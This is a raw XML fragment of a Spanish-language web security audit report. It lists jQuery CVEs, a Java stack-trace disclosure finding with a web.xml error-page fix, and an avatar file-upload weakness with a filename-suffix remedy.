                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">OWASP TOP 10 2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D9">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A06</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001DA">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Impacto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001DB">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Al tratarse de una versión antigua del software, puede ser vulnerable a ataques.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001DC">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Solución</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D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DE">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1DF">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Actualice su instalación de jQuery a la última versión estable.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E0">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerabilidades conocidas de esta versión</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E1">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Vulnerabilidad jQuery Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')</w:t>
              <w:br w:type="textWrapping"/>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">En versiones de jQuery mayores o iguales a 1.0.3 y anteriores a 3.5.0, pasar HTML que contenga elementos desde fuentes no confiables - incluso después de sanearlo - a uno de los métodos de manipulación DOM de jQuery (por ejemplo .html(), .append(), y otros) puede ejecutar código no confiable. Este problema se ha corregido en jQuery 3.5.0.</w:t>
              <w:br w:type="textWrapping"/>
              <w:br w:type="textWrapping"/>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">CVSS</w:t>
              <w:br w:type="textWrapping"/>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N</w:t>
              <w:br w:type="textWrapping"/>
              <w:br w:type="textWrapping"/>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">Referencias externas</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">CVE-2020-11023</w:t>
              <w:br w:type="textWrapping"/>
              <w:br w:type="textWrapping"/>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E2">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Vulnerabilidad jQuery Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')</w:t>
              <w:br w:type="textWrapping"/>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">En versiones de jQuery mayores o iguales a 1.2 y anteriores a 3.5.0, pasar HTML de fuentes no confiables - incluso después de sanitizarlo - a uno de los métodos de manipulación DOM de jQuery (por ejemplo .html(), .append(), y otros) puede ejecutar código no confiable. Este problema se ha corregido en jQuery 3.5.0.</w:t>
              <w:br w:type="textWrapping"/>
              <w:br w:type="textWrapping"/>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">CVSS</w:t>
              <w:br w:type="textWrapping"/>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N</w:t>
              <w:br w:type="textWrapping"/>
              <w:br w:type="textWrapping"/>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">Referencias externas</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">CVE-2020-11022</w:t>
              <w:br w:type="textWrapping"/>
              <w:br w:type="textWrapping"/>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E3">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Vulnerabilidad de contaminación de prototipos de JQuery</w:t>
              <w:br w:type="textWrapping"/>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">jQuery antes de la versión 3.4.0, tal y como se utiliza en Drupal, Backdrop CMS y otros productos, maneja mal jQuery.extend(true, {}, ...) debido a la contaminación de Object.prototype. Si un objeto fuente no saneado contenía una propiedad __proto__ enumerable, podía extender el Object.prototype nativo.</w:t>
              <w:br w:type="textWrapping"/>
              <w:br w:type="textWrapping"/>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">Versiones afectadas</w:t>
              <w:br w:type="textWrapping"/>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">1.0 hasta </w:t>
              <w:br w:type="textWrapping"/>
              <w:br w:type="textWrapping"/>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">CVSS</w:t>
              <w:br w:type="textWrapping"/>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N</w:t>
              <w:br w:type="textWrapping"/>
              <w:br w:type="textWrapping"/>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">Referencias externas</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">CVE-2019-11358</w:t>
              <w:br w:type="textWrapping"/>
              <w:br w:type="textWrapping"/>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E4">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:shd w:fill="c9d7f1" w:val="clear"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E5">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:shd w:fill="c9d7f1" w:val="clear"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E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E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E8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_v7hx3z1ozd2r" w:id="12"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Stack Trace Disclosure (Java) -&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E9">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table6"/>
        <w:tblW w:w="66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3860"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="2831"/>
            <w:gridCol w:w="3860"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001EA">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001EB">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248</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001EC">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">OWASP 2013</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001ED">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A6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001EE">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">OWASP 2017</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001EF">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A6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F0">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">CAPEC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F1">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65</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F2">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">ASVS 4.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F3">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1.14.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F4">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">OWASP TOP 10 2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F5">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A05</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F6">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">CVSS 3.0 Puntuación</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F7">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5.3 Media</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F8">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1F9">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:shd w:fill="c9d7f1" w:val="clear"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001FA">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Impacto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001FB">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Un atacante puede obtener información como:Versión de Tomcat.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001FC">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Ruta física de los archivos de Tomcat.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001FD">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Información sobre la excepción generada.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001FE">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Esta información podría ayudar a un atacante a obtener más información y centrarse potencialmente en el desarrollo de nuevos ataques al sistema objetivo.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001FF">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Solución</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000020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01">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202">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Aplique la siguiente configuración a su archivo web.xml para evitar la fuga de información mediante la aplicación de páginas de error personalizadas.&lt;error-page&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000203">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    &lt;código de error&gt;500&lt;/código de error&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000204">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    &lt;location&gt;/server_error.html&lt;/location&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000205">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:shd w:fill="c9d7f1" w:val="clear"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:shd w:fill="c9d7f1" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;/error-page&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_dgrg771l5o17" w:id="13"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">File Intrusion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000021C">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Partiendo de este código, nos es posible añadir un archivo diferente de una imagen como avatar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000021D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="3225800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="49"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before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Si cambiamos el código de esta forma, podemos impedir que esto suceda, ya que únicamente aceptará archivos cuyo nombre termine por “.jpg”.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="1841500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2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before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Podemos agregar a su vez un nuevo mensaje de error correspondiente con este cambio (claro que sería necesario crearlo)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="1790700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="37"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before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3433763" cy="905528"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="39"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3433763" cy="90552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before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Demostración</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000222">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="3543300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="60"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5731200" cy="354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23">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
